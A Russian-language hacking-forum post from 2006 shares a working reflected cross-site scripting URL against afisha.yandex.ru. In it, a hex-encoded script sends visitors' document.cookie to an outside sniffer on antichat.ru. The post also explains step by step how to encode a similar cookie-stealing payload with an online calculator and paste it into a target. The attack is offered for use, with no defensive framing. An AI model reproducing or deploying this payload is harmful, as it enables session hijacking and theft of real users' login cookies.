18.12.2006, 21:11
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585
Репутация:
441
|
|
СмоРи и Юзай... 
Код:
http://afisha.yandex.ru/reviews.xml?event_id=14913381&city=%22%3E%3C%73%63%72%69%70%74%3E%69%6D%67%20%3D%20%6E%65%77%20%49%6D%61%67%65%28%29%3B%20%69%6D%67%2E%73%72%63%20%3D%20%22%68%74%74%70%3A%2F%2F%61%6E%74%69%63%68%61%74%2E%72%75%2F%63%67%69%2D%62%69%6E%2F%73%2E%6A%70%67%3F%22%2B%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%3B%3C%2F%73%63%72%69%70%74%3E
ВообЩем кто не понял... заходим к примеру на http://ha.ckers.org/xss.html
там в самон низу есть
Character Encoding Calculator
ASCII Text:
значит сюда вбиваем "><script>img = new Image(); img.src = "http://site/ваш_сниф.gif?"+document.cookie;</script>
и жМЁм Encode и получаем в строке Hex Value: наШу хренотень..и вставляем куда надо..
аВось кто ПлюсиК поставит...
Последний раз редактировалось DimOnOID; 18.12.2006 в 21:38..
|
|
|